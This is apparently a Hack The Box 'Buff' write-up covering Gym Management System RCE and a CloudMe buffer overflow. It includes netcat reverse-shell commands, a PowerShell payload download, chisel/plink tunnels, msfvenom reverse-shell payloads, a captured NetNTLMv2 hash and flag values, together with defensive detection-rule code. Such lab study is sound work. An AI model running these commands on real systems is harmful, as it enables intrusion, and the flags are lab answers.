Buff - 23.08.2021
NMap
Home page
Gym Management Software 1.0
Searchsploit
┌──(kali㉿kali)-[~/htb/buff]
└─$ searchsploit gym
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection | php/webapps/42801.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Reverse shell
nc.exe 10.10.14.20 9010 -e cmd.exe    (run on the target)
rlwrap nc -lvnp 9010    (run on Kali)
user.txt
f04db2c70240ebcf1019bd7734babd24
Privilege Escalation
systeminfo
systeminfo
Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: shaun
Registered Organization:
Product ID: 00329-10280-00000-AA218
Original Install Date: 16/06/2020, 15:05:58
System Boot Time: 23/08/2021, 10:17:48
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 19/06/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,482 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,670 MB
Virtual Memory: In Use: 2,129 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.198
[02]: fe80::493d:61ad:c517:c5e4
[03]: dead:beef::e024:6789:7e5e:1e93
[04]: dead:beef::54a:8bbc:8ebf:c03b
[05]: dead:beef::493d:61ad:c517:c5e4
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
python 48506.py http://10.10.10.198:8080/
nc.exe 10.10.14.20 9010 -e cmd.exe
WinPEAS
Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash: shaun::BUFF:1122334455667788:6e2756fbb3d748e7c484c39f3443a79d:0101000000000000af16af8fd898d7016a225ae50aaf05eb0000000008003000300000000000000000000000002000008751ec7975c33ca4c304e0296f3cfb421f1d41f54d2cf55b5981ed29cb7ee4b10a00100000000000000000000000000000000000090000000000000000000000
Downloading files from cmd.exe
powershell -Command "Invoke-WebRequest -Uri 'http://10.10.14.20/shell.exe' -OutFile 'C:\xampp\htdocs\gym\upload\shell.exe'"
Msfvenom did not work.
Contents of the Documents folder
Contents of the Downloads folder
Tasklist
The CloudMe.exe process is running on the box. CloudMe listens on port 8888, which can be confirmed with netstat:
netstat -an | findstr 127.0.0.1
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING
Searchsploit
The exploit has the following structure. The payload in the middle can be overwritten with something else:
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
Port Forward
First the port has to be forwarded: CloudMe on port 8888 listens only locally, so we use plink.exe to forward port 8888 to our machine.
plink.exe -l kali -pw kali 10.10.14.20 -R 8888:127.0.0.1:8888
or
plink.exe -R 8888:127.0.0.1:8888 -P 4222 kali@10.10.14.20
plink.exe did not work; in the end Chisel solved it.
Forwarding port 3306 (mysql) and 8888 (cloudme):
chisel server --reverse --port 9002    (on Kali)
chisel.exe client 10.10.14.20:9002 R:3306:localhost:3306 R:8888:localhost:8888    (on the box)
Check:
netstat -na | grep -i 8888
Works.
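Seen from the blue-team side, every step above leaves a distinctive process command line: nc.exe with -e, a PowerShell download written straight into the XAMPP web root, and the plink/chisel reverse port forwards. The Python below is an added example (not from this writeup or from any of the tools it uses) that runs three regex rules over constructed, Sysmon-like process-creation records modelled on those command lines; the event records, field names and rule names are assumptions.

```python
import re

# Constructed process-creation records in a Sysmon-like shape (hypothetical,
# not captured from the box); the command lines mirror the ones in this writeup.
SAMPLE_EVENTS = [
    {"image": r"C:\xampp\htdocs\gym\upload\nc.exe",
     "cmdline": "nc.exe 10.10.14.20 9010 -e cmd.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -Command \"Invoke-WebRequest -Uri 'http://10.10.14.20/shell.exe' "
                "-OutFile 'C:\\xampp\\htdocs\\gym\\upload\\shell.exe'\""},
    {"image": r"C:\Users\shaun\Downloads\chisel.exe",
     "cmdline": "chisel.exe client 10.10.14.20:9002 R:3306:localhost:3306 R:8888:localhost:8888"},
    {"image": r"C:\Users\shaun\Downloads\plink.exe",
     "cmdline": "plink.exe -R 8888:127.0.0.1:8888 -P 4222 kali@10.10.14.20"},
    {"image": r"C:\Windows\System32\netstat.exe", "cmdline": "netstat -an"},
]

# Each rule: (name, compiled regex over the command line). Case-insensitive,
# because Windows command lines are.
RULES = [
    # netcat spawning a shell with -e: nc.exe <host> <port> -e cmd.exe
    ("netcat_exec_shell",
     re.compile(r"\bnc(?:64)?(?:\.exe)?\b.*\s-e\s+\S*(?:cmd|powershell)", re.I)),
    # reverse port forwards: plink -R <port>:... or chisel client ... R:<port>:...
    ("reverse_port_forward",
     re.compile(r"(?:\bplink(?:\.exe)?\b.*\s-R\s+\d+:|\bchisel(?:\.exe)?\s+client\b.*\sR:\d+:)", re.I)),
    # PowerShell download whose -OutFile lands inside the XAMPP web root
    ("webroot_download",
     re.compile(r"Invoke-WebRequest.*-OutFile\s+'?[^'\s]*\\htdocs\\", re.I)),
]


def classify(cmdline):
    """Return the names of every rule the command line matches, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events):
    """Return (rule_name, cmdline) pairs for every hit across the event list."""
    hits = []
    for ev in events:
        for name in classify(ev["cmdline"]):
            hits.append((name, ev["cmdline"]))
    return hits


if __name__ == "__main__":
    for name, cmd in scan(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

The plain netstat call in the sample is there to show the rules stay quiet on ordinary administration.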
MsfVenom
We will use the following payload:
msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=9001 -b '\x00\x0A\x0D' -f python
Payload! The important thing is the underscore (_) instead of the slash (/) in windows/shell_reverse_tcp: the slash variant (windows/shell/reverse_tcp) is a staged payload that needs a Metasploit handler rather than a plain nc listener.
Paste the generated payload into the exploit.
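The -b '\x00\x0A\x0D' option asks the encoder to avoid NUL, LF and CR, and the -f python layout is what gets pasted into the exploit. Before pasting, it is worth rebuilding the raw bytes and confirming the bad-char list was honoured and the payload still fits the buffer; the Python below is an added example (not from the writeup or from msfvenom) that does exactly that, with constructed sample payloads and an assumed max_len parameter standing in for the exploit's buffer size.

```python
import re

BAD_CHARS = b"\x00\x0a\x0d"  # the bytes excluded with -b in the msfvenom command above

# Constructed samples in msfvenom "-f python" layout (arbitrary bytes, not a real payload).
SAMPLE_CLEAN = r'''
buf =  b""
buf += b"\x90\x90\xeb\x0e\x31\xc9\xb1\x52\x83\xea\xfc"
buf += b"\x5a\x33\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x0e"
'''
SAMPLE_DIRTY = r'''
buf =  b""
buf += b"\x90\x0a\x00\x0e\x31\xc9"
'''

HEX_BYTE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_python_buf(text):
    """Rebuild the raw bytes from lines of the form: buf += b"\\x..\\x..". """
    out = bytearray()
    for line in text.splitlines():
        if line.strip().startswith("buf +="):
            out.extend(int(h, 16) for h in HEX_BYTE.findall(line))
    return bytes(out)


def bad_chars_present(payload, badchars=BAD_CHARS):
    """Return the set of forbidden byte values that still occur in the payload."""
    return {b for b in payload if b in badchars}


def check_payload(text, max_len=None, badchars=BAD_CHARS):
    """Summarise a -f python payload: size, leftover bad chars, and whether it fits.

    max_len is an assumed limit supplied by the caller (the exploit's buffer size);
    None means no size check."""
    payload = parse_python_buf(text)
    leftover = bad_chars_present(payload, badchars)
    fits = max_len is None or len(payload) <= max_len
    return {"length": len(payload), "bad_chars": sorted(leftover), "ok": not leftover and fits}


if __name__ == "__main__":
    print(check_payload(SAMPLE_CLEAN))
    print(check_payload(SAMPLE_DIRTY))
```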
rlwrap nc -lvnp 9001    (listener on Kali)
python3 48389.py    (run the exploit)
root.txt
5760db8b9792445e42d55ee110f4fbbb